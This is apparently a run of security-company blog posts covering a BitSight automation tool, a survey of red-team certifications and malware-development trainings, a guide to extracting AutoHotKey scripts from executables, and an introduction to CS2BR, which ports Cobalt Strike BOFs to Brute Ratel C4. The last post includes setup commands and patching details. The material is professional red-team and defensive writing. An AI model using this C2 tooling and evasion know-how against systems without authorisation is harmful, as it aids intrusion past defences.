The same process can be set up on Linux as well, using cron jobs.

Write the following new line into the “/etc/crontab” file and replace ‘{your-tool-directory}’ with your tool’s directory (i.e. /opt/bitsight):

10 9 1 * * kali cd {your-tool-directory} && python bitsight_automation.py historical -g Root --months 12

This will execute the tool every first of the month at 9:10 in the morning.

Troubleshooting

While executing this tool you might run into some issues here and there. This section will go over the 2 most common notifications you might encounter while using BitSight Automation.

Total Risk Monitoring Subscription Required

You may have noticed that in the Execution section a couple of operations carry a note saying “This operation requires a ‘Total Risk Monitoring’ subscription to work. Otherwise it will produce an error”. These types of errors are usually encountered in the Findings and Assets operations. The output will look something like this.

If we remove the ‘Total Risk Monitoring’ subscription from EntityOne and execute the findings operation on it again, we will run into the following error:

PS ~/> Python .\bitsight_automation.py findings -e EntityOne -s Critical

It appears as there are no findings in EntityOne or there is something wrong with the API. Please validate the old fashioned way using your browser.
More Details: list index out of range
It might be the case you do not have a 'Total Risk Monitoring' subscription. The 'Risk Monitoring' subscription is unable to work with the API for this operation

Response: {'links': {'next': None, 'previous': None}, 'count': 0, 'results': []}

File not Found *.JSON

In case you execute the tool and it reports back with “File not found”, it means that somehow the necessary files were deleted. In order to resolve this issue, you need to create the files again with the text “{}” inside them.

PS ~/> Python .\bitsight_automation.py findings -e EntityOne -s Critical

File not found:  'group_mapper.json'. Please copy the  'group_mapper.json' to the same directory as this tool and try again.
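As a quick PowerShell sketch of that fix, recreating both mapping files with an empty JSON object (you will then need to repopulate them, for example via the update operation):

PS ~/> Set-Content -Path .\group_mapper.json, .\guid_mapper.json -Value '{}'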

Conclusion

This blog post presented the BitSight Automation Tool as a valuable enhancement for organizations employing BitSight as their solution for performing external assessments and reducing exposure.

Some key perks of this tool are as follows:

  1. Automates a lot of operations that otherwise are time consuming.
    1. Rating -> Retrieve the current score of an entity and confirm it’s above or equal to your company’s required security policies or digital mandate.
    2. Findings -> Generate a filtered list of vulnerabilities for an entity to remediate.
    3. Assets -> Retrieve the asset count and asset list of an entity, to validate your public IP space.
    4. Reverse Lookup -> Investigate where an IP, IP Range, domain or domain wildcard is attributed to and what IPs or domains it is associated with.
    5. Historical Ratings -> Sets up an overview of ratings for a given entity or group over a specified timeframe (maximum 1 year) to showcase in reports and review progress or regress.
  2. Allows the possibility to configure scheduled executions of the tool and create monthly/daily/yearly reports per your needs.
  3. Provides an easy to use command interface. It can also be compiled as an executable version to avoid having to install dependencies and to make it usable by anyone. (From analysts to CISO.)

Konstantinos Papanagnou

Konstantinos is a Senior Cybersecurity Consultant at NVISO Security.

With a background in software engineering, he has an extensive set of skills in coding which helps him in day-to-day operations even in the Cybersecurity area. His motto; “Better spend 5 hours debugging your automation, than 5 minutes performing an automatable task”.

Unlocking the power of Red Teaming: An overview of trainings and certifications

31 July 2023 at 07:00

NVISO enjoys an excellent working relationship with SANS and has been involved as Instructors and Course Authors for a variety of their courses:


As technology continues to evolve, so do the tactics and techniques used by cyber criminals. This means that staying up to date as a red team operator is crucial for protecting customers against the constantly changing threat landscape. Red team operators are tasked with simulating real-world attacks on a customer’s system to identify weaknesses and vulnerabilities before they can be exploited by malicious actors. By staying informed about the latest attack methods and trends, red team operators can provide more effective and relevant testing that accurately reflects the current threat landscape. Additionally, keeping up with emerging technologies and security measures can help red team operators develop new tactics and strategies to better protect customers from potential cyberattacks.

While red teams are primarily responsible for simulating attacks and identifying vulnerabilities, blue teams play a critical role in defending against these attacks and protecting an organization’s assets. Attending trainings that are typically attended by red teams can provide valuable insights and knowledge that blue teams can use to better defend their organization. By understanding the latest attack methods and techniques, blue teams can develop more effective defense strategies, identify potential vulnerabilities and patch them before they can be exploited by attackers. Additionally, attending these trainings can help blue teams better understand the tactics and tools used by red teams, allowing for more effective collaboration and communication between the two teams. Overall, attending red team training can help blue teams stay informed and prepared to defend against the constantly evolving threat landscape.

TL;DR

If you do not have much time at hand, do not worry, the following tables may provide you a quick overview:

Certification Name | Beginner | Intermediate | Expert
Red Team Ops (CRTO1)🔑
Red Team Ops II (CRTO2)🔑
Certified Red Team Professional (CRTP)🔑
Certified Red Team Expert (CRTE)🔑
Certified Red Team Master (CRTM)🔑
Certified Az Red Team Professional (CARTP)🔑
Training Name | Beginner | Intermediate | Expert
Malware on Steroids🔑
Red Team Operations and Adversary Emulation (SEC565)🔑
Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection (SEC699)🔑
RED TEAM Operator: Malware Development Essentials Course🔑
RED TEAM Operator: Malware Development Intermediate Course🔑
RED TEAM Operator: Malware Development Advanced – Vol.1🔑
Corelan “BOOTCAMP” – stack exploitation🔑

Disclaimer:

It is important to note that the certifications and trainings included in the review are not an exhaustive list of all the options available and are not in a specific order.
While the ones highlighted in the review are all excellent and worth considering, there may be other certifications and trainings that could also be beneficial for your specific needs and goals.
It is always essential to do your own research and carefully consider your options before deciding. Ultimately, the best certification or training for you will depend on your individual circumstances, interests, and career aspirations.

Certifications

Red Team Ops – CRTO1

The Red Team Ops 1 course is a very well-done certification that teaches you basic red team operator principles, provides handy tools to get you started, and shows techniques you will use as a red team operator.

You will learn how to start and configure the team server (for this certification, Cobalt Strike from FORTRA), how to manage the listeners, and the basics of payload generation.

The certification is a must for beginners who want to learn how to go from initial compromise, to moving laterally, to finally taking over the whole domain.

Of course, Microsoft Defender (not Defender ATP/MDE) and application whitelisting are also part of the course, to prepare you for the much-needed evasion in customer environments by using the artifact and resource kits available with Cobalt Strike.

Who should take this course?

If you are new to the game, this course is made for you! If you already have infrastructure security assessment experience, this course adds new attack paths to your inventory and includes some important tips for OPSEC, which in red team engagements is quite different from what you know from an internal security assessment, where stealth is optional.

I enjoyed the exam a lot, and in comparison to the price of SANS certifications, this is also a great opportunity for someone with a tighter budget. Thanks, Zeropoint Security!

Associated costs

365 GBP = 415,32 EUR = 452,89 USD (as of 04/04/2023)

The price includes the course materials as well as a voucher for the first exam attempt.

The RTO lab is sold as a subscription to those who have purchased the course.

The price is 20/40/60 GBP per month for 40/80/120 hours of runtime respectively.

Red Team Ops II – CRTO2

The Red Team Ops 2 course aims to build on the foundation of the Red Team Ops course in order to help you improve your OPSEC skills and show you ways to bypass more defense mechanisms.

It is important to note here that this course is NOT a newer version of, or a replacement for, the first course.

The course will introduce the concept of public redirectors and rewrite rules to you, which can then be applied in the wild.

To help you understand the evasion techniques, some common Windows APIs are being covered as well as P/Invoke and D/Invoke which allow you to dynamically invoke unmanaged code and avoid API hooks.

Other indicators such as RWX memory regions and suspicious command lines will be treated with PPID and Command Line Spoofing.

Since Microsoft has upped its security game quite a bit, Attack Surface Reduction should not be missed out on, and as such it is also included in this course, with examples of how to bypass a subset of the default rules.

If you have struggled with Applocker in the past, welcome to the game. The bigger brother “Windows Defender Application Control (WDAC)” is waiting for you and allows the blue team to even better protect the environment.

The cherry on top of the course is the chapter treating different types of EDR hooks, syscalls and how to integrate goodies into the artifact kit.

Who should take this course?

If you already have completed the Red Team Ops 1 course this is a great addition to extend the knowledge gathered in the first round. In more mature environments you will face WDAC, EDRs from different providers and better blue team responses. Similar to the first course the price is very attractive and the hands-on experience in a lab and not just on paper is worth every dime.

If you think your existing knowledge already covers the first course, you can also jump to this one directly. The exam can cover parts of the first course, such as reconnaissance and privilege escalation/lateral movement, so I would not recommend going for CRTO2 without prior red teaming knowledge.

Associated costs

399 GBP = 453,86 EUR = 495,07 USD (as of 04/04/2023)

The price includes the course materials as well as a voucher for the first exam attempt.

The RTO II lab is sold as a subscription to those who have purchased the course.

The price is 15 GBP per month for 40 hours of runtime.

Certified Red Team Professional (CRTP)

The Certified Red Team Professional (CRTP) course provides you with a hands-on lab environment with multiple domains and forests to understand and practice cross trust attacks. This allows you to learn and understand the core concepts of well-known Windows and Active Directory attacks which are being used by threat actors around the globe.

Windows tools like PowerShell and other off-the-shelf features are used for attacks, letting you try scripts, tools and new attacks in a fully functional AD environment.

At the time of this blog post, the lab makes use of Microsoft Windows Server 2022 and SQL Server 2017 machines.

Lab environment (AD Attacks Lab (CRTP) (alteredsecurity.com))

Who should take this course?

If you are new to topics like Active Directory enumeration, mapping trusts between different domains, escalating privileges via domain attacks, or Kerberos-based attacks like golden and silver tickets, this course is a good bet.

Additionally, the SQL server trusts and defenses as well as bypasses of defenses are covered.

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 249 USD ~ 227,58 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 379 USD ~ 346,40 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 499 USD ~ 456,08 EUR (as of 05/04/2023)

The course mentions the following content:

23 Learning Objectives, 59 Tasks, >120 Hours of Torture

https://www.alteredsecurity.com/adlab

Please keep in mind that the certificate has an expiry time of three years and then needs to be renewed.

Certified Red Team Expert (CRTE)

After completing the Certified Red Team Professional (CRTP), you might be looking to explore more of the Microsoft features that can be implemented in customer environments. This course will allow you to play with the Local Administrator Password Solution (LAPS), Group Managed Service Accounts (gMSA) and Active Directory Certificate Services (AD CS).

As customers often have resources in the cloud as well, Azure AD integration (Hybrid Identity) and the related attack paths are also presented in this course.

The person taking the course will learn to understand implemented defenses and how to bypass them, for example: Just Enough Administration (JEA), Privileged Access Workstations (PAWs), Local Administrator Password Solution (LAPS), Selective Authentication, Deception, App Allowlisting, Microsoft Defender for Identity and more.

Lab environment (Windows Red Team Lab (CRTE) (alteredsecurity.com))

Who should take this course?

If you feel ready to dive into the more advanced defense mechanisms mentioned above, this course will certainly help you to identify these in an environment and navigate in a more mature environment covertly.

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 299 USD ~ 273,28 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 499 USD ~ 456,08 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 699 USD ~ 638,87 EUR (as of 05/04/2023)

The course mentions the following content:

28 Learning Objectives, 62 Tasks, >300 Hours of Torture

https://www.alteredsecurity.com/redteamlab

Please keep in mind that the certificate expires after three years and then needs to be renewed.

Certified Red Team Master (CRTM)

The goal of this course is to compromise multiple forests with a minimal footprint, while gaining full control over the starting/home forest.

As consulting is more than just attacking infrastructure, the course also includes the submission of a report that contains details of attacks on target forests and details of security controls/best practices implemented on the starting/home forest.

Lab environment (Global Central Bank (CRTM) (alteredsecurity.com))

Who should take this course?

I would suggest this course if you want to put your technical knowledge to the test while also taking a step behind the lines of a blue team, as you need to document details of the security controls in place and how they could be mitigated best. This will help you to grow in the long term and make it possible to think like a defender in order to improve your evasion techniques.

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 399 USD ~ 364,68 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 599 USD ~ 547,47 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 749 USD ~ 684,57 EUR (as of 05/04/2023)

The course mentions the following content:

46 Challenges and >450 Hours of Torture

https://www.alteredsecurity.com/gcb

Please keep in mind that the certificate expires after three years and then needs to be renewed.

Certified Az Red Team Professional (CARTP)

Azure Active Directory is nowadays often used as an Identity and Access Management platform in a hybrid cloud model. It also allows on-premises Active Directory applications and infrastructure to be connected to Azure AD. This step brings some very interesting opportunities to the table, but also risks.

When talking about red teaming and penetration testing, these risks can be mapped onto the following phases: Discovery, Initial access, Enumeration, Privilege Escalation, Lateral Movement, Persistence and Data exfiltration. All of these phases are covered in the course. The most value for the customers results from not just identifying and abusing vulnerabilities in the environment, but also making clear suggestions for mitigations that can be implemented in the short or long term in the customer environment.

Lab environment (Attacking & Defending Azure AD Lab (CARTP) (alteredsecurity.com))

Who should take this course?

If you are a security professional trying to strengthen your skills in Azure cloud security, Azure Penetration testing or Red teaming in Azure environments, this is the right course for you!

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 449 USD ~ 410,38 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 649 USD ~ 593,17 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 849 USD ~ 775,97 EUR (as of 05/04/2023)

The course mentions the following content:

26 Learning Objectives, 77 tasks, 7 Live Azure Tenants, >140 hours of fun!

https://www.alteredsecurity.com/azureadlab

Please keep in mind that the certificate expires after three years and then needs to be renewed.

Trainings

Malware on Steroids

https://0xdarkvortex.dev/training-programs/malware-on-steroids/

The course is dedicated to building your own C2 infrastructure and payloads. To achieve that, it offers an introduction to Windows internals, followed by a full hands-on experience of building your own Command & Control architecture with different types of initial access payloads and their lifecycle: initial access, in-memory evasion and different types of payload injection, including but not limited to reflective DLLs, shellcode injection, COFF injection and more.

The course is offered in a time span of 4 days with 6-7 hours per day in an online interactive environment.

Lab environment (Dark Vortex (0xdarkvortex.dev))

Who should take this training?

If you have always wanted to write your own C2 and create droppers and stagers in x64 assembly and C, this course is perfect for you. Please keep in mind that fundamental knowledge of programming in C/C++/Python3 and familiarity with programming concepts such as pointers, references, addresses, data structures, threads and processes is listed as a requirement.

Associated costs

2,500 USD ~ 2281,95 EUR (as of 05/05/2023)

The price includes a certificate of completion, all the training materials including course PDFs/slides, content materials, source code for payloads and a python3 C2 built during the training program.

SEC565: Red Team Operations and Adversary Emulation

https://www.sans.org/cyber-security-courses/red-team-operations-adversary-emulation/

The SEC565 is one of the courses where you not only improve your technical ability to abuse vulnerabilities, but also your skills around the whole engagement, from planning to making sure the work you deliver is of high quality and of the greatest benefit to the customer.

The focus of the course is to learn how to plan and execute end-to-end Red Teaming engagements that leverage adversary emulation, including the skills to organize a Red Team, consume threat intelligence to map against adversary tactics, techniques, and procedures (TTPs), emulate those TTPs, report and analyze the results of the Red Team engagement, and ultimately improve the overall security posture of the organization.

The in-person course is 6 days long for a reason. It covers planning the emulation, building the infrastructure, initial access and persistence, Active Directory attacks and ways to move from one compromised host to another. Since documenting the abused vulnerabilities and achieving the requested objectives is very important for a red team, reporting has a dedicated time slot as well.

The last block contains a capture-the-flag red team lab consisting of 3 domains, including Windows servers, workstations and databases as well as the Active Directory infrastructure, to test the skills you learned earlier.

Who should take this course?

Defensive security professionals to better understand how Red Team engagements can improve their ability to defend by better understanding offensive methodologies, tools, tactics, techniques, and procedures.

Offensive security professionals looking to improve their craft and also improve their methodology around the technical part of the engagement (adversary emulation plan, safe sensitive data exfiltration, planning for retesting and more).

Associated costs

The course is being offered On-Demand (Online) and In Person.

The On Demand course is 8,275 USD ~ 7534.24 EUR (as of 02/05/2023)

The In Person course is priced at 7,695 EUR + OnDemand Bundle (785 EUR) = 8,480€ (as of 02/05/2023)

SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection

The SEC699 is one of the more unique courses where you get detailed insights into both red & blue team.

The course contents have been created by both blue teamers and red teamers and that is reflected in the detail of the course material.

The focus of the course is to learn how to emulate threat actors in a realistic enterprise environment and how to detect those actions.

As proper purple teaming needs to follow a suitable process, tooling and planning, the course makes sure that these important parts are not missing. In-depth techniques such as Kerberos delegation attacks, Attack Surface Reduction / AppLocker bypasses, AMSI, process injection, COM object hijacking and many more are executed during the course, and to build on the challenge you will write SIGMA rules to detect these techniques.

Who should take this course?

Defensive security professionals looking to gain insights in the actual operation of carrying out attacks to understand the perspective of an attacker: Which tools are being used? What does a C2 setup look like? How does an attacker communicate with the C2 infrastructure? How can I use automation to my advantage?

Offensive security professionals looking to gain insights in logging & monitoring, which footprint and events are being generated using specific techniques and how the operational security can be improved to stay stealthier.

Associated costs

The course is being offered On-Demand (Online) and In Person.

The On Demand course is 7,785 USD ~ 7148.73 EUR (as of 04/04/2023)

The In Person course is priced at 7,170 EUR + OnDemand Bundle (785 EUR) = 7,955€ (as of 04/04/2023)

RED TEAM Operator: Malware Development Essentials

Malware, similar to software you use every day, has to be developed, and this course guides you through it.

Starting with what malware development is and how PE files are being structured, it helps you to understand how to encode and encrypt your payloads as well as how to store them inside a PE file.

Remote process injection, as well as backdooring an existing binary, is also explained with hands-on code examples to follow and customize.

Who should take this training?

If you are getting started with developing your own loaders and stagers, this course is awesome to get the fundamentals right and gives you customizable source code that you can improve and build upon.

Associated costs

199 USD ~ 181,64 EUR (as of 05/04/2023)

A virtual machine with a complete environment for developing and testing your software, and a set of source code templates are included in the price.

RED TEAM Operator: Malware Development Intermediate

After the course “RED TEAM Operator: Malware Development Essentials” you might be wondering where to go next. This course builds on that foundation to extend your tooling with more code injection techniques, shows how to build your own custom reflective binary, and explains how to hook APIs in memory to monitor or evade functions.

Sooner or later, you have to migrate between processes that have loaded your shellcode so the section on how to migrate between 32- and 64-bit processes comes to the rescue. Finally, the course guides you on how to use IPC to control your payloads.

Who should take this training?

If you completed the course “RED TEAM Operator: Malware Development Essentials” and you are ready to take your skills to the next level, this course helps you to extend the kit you built in the first course.

Associated costs

229 USD ~ 209,03 EUR (as of 05/04/2023)

A virtual machine with a complete environment for developing and testing your software, and a set of source code templates are included in the price.

RED TEAM Operator: Malware Development Advanced – Vol.1

As the name of the course suggests, after the essentials and the intermediate course, the advanced course teaches you how to enumerate processes, their modules and handles in order to identify a suitable process for injection. Payloads cannot only be hidden in PE files; the course therefore also covers how to hide payloads in different parts of NTFS, in the registry and in memory.

It demonstrates how any API (with any number of params) in a remote process can be called by using a custom “RPC” and how exception handlers can be abused.

You will learn how to build, parse, load and execute COFF objects in memory and much more.

Who should take this training?

After completing the Essentials and Intermediate course of the malware development series of Sektor7, I can only recommend this training to further strengthen your knowledge of how the Windows internals work and give you ideas for how to exploit them in the future.

Associated costs

239 USD ~ 218,15 EUR (as of 05/04/2023)

A virtual machine with a complete environment for developing and testing your software, and a set of source code templates are included in the price.

Corelan “BOOTCAMP” – stack exploitation

One thing to start with, the 2021 edition of the course is based on Windows 10/11 and contains an introduction to x64 stack-based exploitation in case you care for up-to-date material and operating systems.

Although the training is based on Windows 10/11, it starts with the fundamentals by explaining the basics of stack buffer overflows and exploit writing.

The training provides you with a solid understanding of current stack-based exploitation techniques and memory protection bypass techniques. The training provider mentions that the course material is kept updated with current techniques, previously undocumented tricks and techniques, and details about research that was performed by the training author.

A small excerpt of the training contents:

  • The x86 environment
  • Stack Buffer Overflows
  • Egg hunters
  • ASLR
  • DEP
  • Intro to x64 stack-based exploitation

Who should take this training?

If you do like challenges, this training is for you. Anyone interested in exploit development or analysis is the target audience of this training.

The training itself does not provide solutions for any of the exercises that you will work through but instead provides help either during the course or after the course (via the student-only support system).

Associated costs

The In-Person training is listed at 2,500 EUR + 525 EUR VAT.

At the time of 05/04/2023 this is equal to 2738,89 USD + 575,17 USD VAT.

The path I chose to walk on

I started as a penetration tester / security consultant with a lot of self-gained knowledge from home projects, ranging from Active Directory setups at home to self-built network-attached storage, which gave me a good base in debugging problems and general operating system usage.

During my security consulting path I then chose to start with the Offensive Security Certified Professional (OSCP) certification as this allowed me to understand some basic exploitation techniques and also get in contact with report writing and evidence collection.

Then there was a slight change in paths for dedicating my life to mobile security, but I always kept an eye on infrastructure security and did some projects in the mix.

After some years in the field, I knew I wanted a new challenge and decided to complete my CRTO1 certification.

I approached NVISO and, after joining and completing the first larger projects, I was hungry for more and completed my CRTO2 certification.

There are so many more trainings I have on my list, so keep it coming!

Education at NVISO

ARES assembles highly skilled expert professionals. This pool consists of people having 5+ years of experience in penetration testing and red team exercises, as well as blue team experts with knowledge on threat hunting and SOC operations.

The ARES team together currently holds the following certifications:

  • GPEN / GRID / GXPN / GCTI / GDAT / GCIA / GMOB
  • OSCP / OSEP / OSED / OSEE / OSWE / OSCE
  • CRTO1 / CRTO2
  • CRTP / CRTE / PACES / CARTP
  • eCPPTv2 / eWPTXv2

Our ARES team at NVISO is dedicated to offering red team services to customers around the globe in order to identify gaps in incident detection and response handling and to improve the security posture of the companies many of us interact with daily.

See the ARES homepage for more information.

Steffen Rogge

Steffen is a Cyber Security Consultant at NVISO, where he mostly conducts Purple & Red Team assessments with a special focus on TIBER engagements.

This enables companies to evaluate their existing defenses against emulated Advanced Persistent Threat (APT) campaigns.

The SOC Toolbox: Analyzing AutoHotKey compiled executables

20 July 2023 at 07:00

One day, a long time ago, whilst handling my daily tasks, an alert was generated for an unknown executable that was flagged as malicious by Microsoft Cloud App Security.

When I downloaded the file through the Microsoft security center, I immediately noticed that it might be an AutoHotKey script, namely by looking at the icon, which is the AutoHotKey logo.

As with many unknown executables, I like to inspect the executable in PE Studio and look at the strings. URL patterns are a quick way to see whether an executable could be exfiltrating data, provided no obfuscation was used.
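If PE Studio is not at hand, a similar quick triage can be done with a few lines of Python — a rough stand-in for running strings and grepping for URLs (the script and file names are only examples):

import re
import sys

# Crude triage: pull printable ASCII runs from the binary and flag URL-like strings.
data = open(sys.argv[1], "rb").read()          # e.g. python3 strings_urls.py sample.exe
strings = re.findall(rb"[ -~]{6,}", data)      # printable runs of 6+ characters
for s in strings:
    if re.search(rb"https?://", s):
        print(s.decode(errors="replace"))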

In the strings section of PE Studio there were multiple mentions of AutoHotKey, which confirmed my previous suspicion that this was indeed an AutoHotKey executable. A colleague of mine mentioned this YARA rule to detect AutoHotKey executables, which could be used to identify this file.

AutoHotKey executable in PE studio

After a quick internet search I found the program Exe2Ahk (www.autohotkey.com/download/Exe2Ahk.exe) which promises to convert executables to AHK (AutoHotKey) scripts. However, this program did not work for me and I had to find another way to extract the AutoHotKey script.

Unsuccessful extraction using Exe2Ahk

Thanks to a forum post on the AutoHotKey forums, I found out that the uncompiled script is present in the RCDATA section of the executable. When inspecting the executable with 7zip, we notice that we can extract the script stored in the .rsrc\RCDATA folder. The AutoHotKey script is named: >AUTOHOTKEY SCRIPT<. The file can be extracted by simply dragging and dropping it from the 7zip folder to any other folder on your PC.

RCDATA folder in 7Zip
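If you prefer scripting the extraction, the same RCDATA resource can also be dumped with the pefile Python module. The snippet below is a minimal sketch (file names are placeholders and error handling is omitted):

import pefile

# Walk the resource directory and dump the ">AUTOHOTKEY SCRIPT<" RCDATA entry.
pe = pefile.PE("sample.exe")
for res_type in pe.DIRECTORY_ENTRY_RESOURCE.entries:
    if res_type.id != pefile.RESOURCE_TYPE["RT_RCDATA"]:
        continue
    for res_name in res_type.directory.entries:
        name = str(res_name.name) if res_name.name else str(res_name.id)
        for res_lang in res_name.directory.entries:
            data = pe.get_data(res_lang.data.struct.OffsetToData,
                               res_lang.data.struct.Size)
            if "AUTOHOTKEY" in name.upper():
                open("extracted_script.ahk", "wb").write(data)
                print(f"Extracted {len(data)} bytes from resource {name}")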

Another website (where I unfortunately lost the URL to) mentioned that the same can be achieved via inspecting the file with Resource Hacker. Resource Hacker parses the PE file sections and can extract embedded files from those sections.

RCDATA folder in Resource Hacker

Once the file is extracted via your preferred method, you can open it in any text editor and start your analysis. If you run into any unknown methods or parameters used in the script, or have difficulty with the syntax, the AutoHotKey documentation can probably help you out.

In this case the file was not malicious, which is why we won’t go into more detail, but we have seen cases in the past where threat actors abused this tool to create malware.

Nicholas Dhaeyer

Nicholas Dhaeyer is a Threat Hunter for NVISO. Nicholas specializes in Threat Hunting, Malware analysis & Industrial Control System (ICS) / Operational Technology (OT) Security. Nicholas has worked in the NVISO SOC solving security incidents for our MDR clients. You can reach out to Nicholas via Twitter or LinkedIn.

Introducing CS2BR pt. II – One tool to port them all

17 July 2023 at 16:00

Introduction

In the previous post of this series we showed why Brute Ratel C4 (BRC4) isn’t able to execute most BOFs that use the de-facto BOF API standard by Cobalt Strike (CS): BRC4 implements their own BOF API which isn’t compatible with the CS BOF API. Then we also outlined an approach to solve this issue: by injecting a custom compatibility layer that implements the CS BOF API using the BRC4 API, we can enable BRC4 to support any BOF.

CS2BR really can port a whole bunch of BOFs!

I’m proud to finally introduce you to our tool CS2BR (“Cobalt Strike to Brute Ratel [BOF]”) in this blog post. We’ll cover its concept and implementation, briefly discuss its usage, show some examples of CS2BR in use and draw our conclusions.

I. The anatomy of CS2BR

The tool is open-source and published on GitHub. It consists of three components: the compatibility layer (based on TrustedSec’s COFFLoader), a source-code patching script implemented in Python and an argument encoder script (also based on COFFLoader). Let’s take a closer look at each of those individually:

The Compatibility Layer

As outlined in the first blog post, the compatibility layer provides implementations of the CS BOF API for the original beacons and also comes with a new coffee entrypoint that is invoked by BRC4, pre-processes BOF input parameters and calls the original BOF’s go entrypoint.

For practical reasons that become apparent further down this post, the layer is split into two files: one for the BOF API implementation (beacon_wrapper.h) and one for the entrypoint (badger_stub.c).

The BOF API implementation borrows heavily from COFFLoader and adds some bits and pieces, such as the Win32 APIs imported by default by CS (GetProcAddress, GetModuleHandle, LoadLibrary and FreeLibrary) and a global variable for the __dispatch variable used by BRC4 BOFs for output. Note that as of this writing, CS2BR doesn’t implement the complete CS BOF API and lacks functions related to process tokens and injection, as those weren’t considered worthwhile pursuing yet.

The entrypoint itself, on the other hand, was built from scratch. Since BRC4’s coffee entrypoint can only be supplied with string-based parameters (whereas CS’ go takes arbitrary bytes), this custom one optionally base64-decodes an input string and forwards it to the CS go entrypoint. To generate the base64-encoded input argument, CS2BR comes with a Python script (encode_args.py, based on COFFLoader’s implementation) that assembles a binary blob of data to be passed to BOFs (such as integers, strings and files).

Patching source code

The compatibility layer alone only gets you so far though – it needs to be patched into a BOF somehow. That’s where the patcher comes in. It’s a Python script that injects the compatibility layer’s source code into any BOF’s source code. Its approach to this is simple and only consists of two steps:

  1. Identify original CS BOF API header files (default beacon.h) and replace their contents with CS2BR’s compatibility layer implementation beacon_wrapper.h.
  2. Identify files containing the original CS BOF go entrypoint and append CS2BR’s custom coffee entrypoint from badger_stub.c.

When I started working on the patcher’s implementation, I wasn’t sure just how tricky these two steps would be to implement: Would I need to come up with tons of RegExes to identify CS BOF API imports? Would I maybe need to parse the actual source code using the actual C grammar to find go entrypoints? Or would I need to compile individual object files and extract line-number information from their metadata?

Luckily, I didn’t have to deal with most of the above. The CS BOF API imports are consistently included as a separate header file called beacon.h, thus they can be found by name in most cases. To find the entrypoint, I wrote a single RegEx: \s+(go)\s*\(([^,]+?),([^\)]+?)\)\s*\{. Let’s briefly break it down using Cyril’s Regex Tester:

The regex used to identify the CS entrypoint in source code

The pattern matches:

  • “go” (optionally surrounded by whitespaces),
  • an open parenthesis denoting the start of the parameter list,
  • the first char* argument (which is any character but “,”),
  • the comma separating both arguments,
  • the second int argument (matching any character but the closing parenthesis),
  • the closed parenthesis denoting the end of the parameter list and
  • an open curly bracket denoting the start of the function definition.
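
To see the pattern in action, here is a quick standalone check in Python (not part of the patcher itself, just an illustration against a minimal BOF source file):

import re

GO_PATTERN = re.compile(r"\s+(go)\s*\(([^,]+?),([^\)]+?)\)\s*\{")

source = """
#include "beacon.h"

void go(char* args, int length) {
    BeaconPrintf(CALLBACK_OUTPUT, "Hello from a BOF");
}
"""

match = GO_PATTERN.search(source)
print(match.group(1))          # go
print(match.group(2).strip())  # char* args
print(match.group(3).strip())  # int length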

This pattern allows CS2BR to identify the entrypoint, optionally rename it and reuse the exact parameter names and types. Once it identified the go entrypoint in a file, it simply appends the contents of badger_stub.c to the file. This stub contains forward-declarations of base64-decoding functions used in the custom coffee entrypoint, the new entrypoint itself, and the accompanying definitions of the base64-decoding functions. And that’s it – BOFs patched this way can now be recompiled and are ready to use in BRC4. If a BOF takes input from CNA scripts, one might need to use the argument encoder.

Encoding BOF Arguments

CS BOFs can be supplied with arbitrary binary data, and the first blog post showed that BRC4 BOFs can’t, since their entrypoints are designed and invoked differently. To remedy this, CS2BR borrows a utility from COFFLoader and comes with a Python script that allows operators to encode input parameters for their BOFs in a way that can be passed via BRC4 into CS2BR’s custom coffee entrypoint:

CS2BR's argument encoder

One drawback of using base64-encoding is the considerable overhead: base64 encodes 3 bytes of input into 4 bytes of ASCII, resulting in 33% overhead. As can be seen in the above screenshot, the raw data of about 6kB is encoded into about 8kB. The script also implements GZIP compression of input data, reducing the raw buffer to about 2.5kB and base64 data to about 3.5kB. As of this writing, however, CS2BR’s entrypoint doesn’t support decompression yet.

II. Using CS2BR

Using CS2BR is pretty straight-forward. You’ll need to patch & compile your BOFs only once and can then execute them via BRC4. If your BOFs accept input arguments, you’ll need to generate them via CS2BR’s argument encoder. Let’s have a look at the complete workflow.

1. Setup, Patching & Compilation

Again, we’ll use CS-Situational-Awareness (SA) as an example. First, clone SA and CS2BR:

git clone https://github.com/trustedsec/CS-Situational-Awareness-BOF
git clone https://github.com/NVISO-ARES/cs2br-bof/

Then, invoke the patcher from the cs2br-bof repo and specify the “CS-Situational-Awareness-BOF” directory you just cloned as the source directory (--src) to patch:

CS2BR's source code patcher

Finally, compile the BOFs as you would usually do:

cd CS-Situational-Awareness-BOF
./make_all.sh

That’s it, simple BOFs (such as whoami, uptime, …) that don’t require any input arguments can be executed directly through BRC4 now:

Executing a simple patched BOF without arguments

2. Encoding Arguments

In order to supply BOFs compiled with CS2BR with input arguments, we’ll use the encode_args script.

Let’s use nslookup as an exemplary BOF for this workflow. It expects up to three input parameters, lookup value, lookup server and type, as defined in CS-Situational-Awareness’ aggressor script:

alias nslookup {
	...
	$lookup = $2;
	$server = iff(-istrue $3, $3, "");
	$type = iff(-istrue $4, # ...
    ...
	$args = bof_pack($1, "zzs", $lookup, $server, $type);
	beacon_inline_execute($1, readbof($1, "nslookup", "Attempting to resolve $lookup", "T1018"), "go", $args);
}

The bof_pack call above assembles these variables into a binary blob according to the format “zzs” ($lookup and $server as null-terminated strings with their length prepended and $type as a 2-byte integer). This binary blob is disassembled by the BOF using the BeaconData* APIs.

BRC4 doesn’t support aggressor scripts, though, so CS2BR’s argument encoder serves as a workaround. As an example, let’s encode blog.nviso.eu for $lookup, 8.8.8.8 for $server and 1 for $type (to query A records, ref. MS documentation):

Encoding arguments for the nslookup BOF

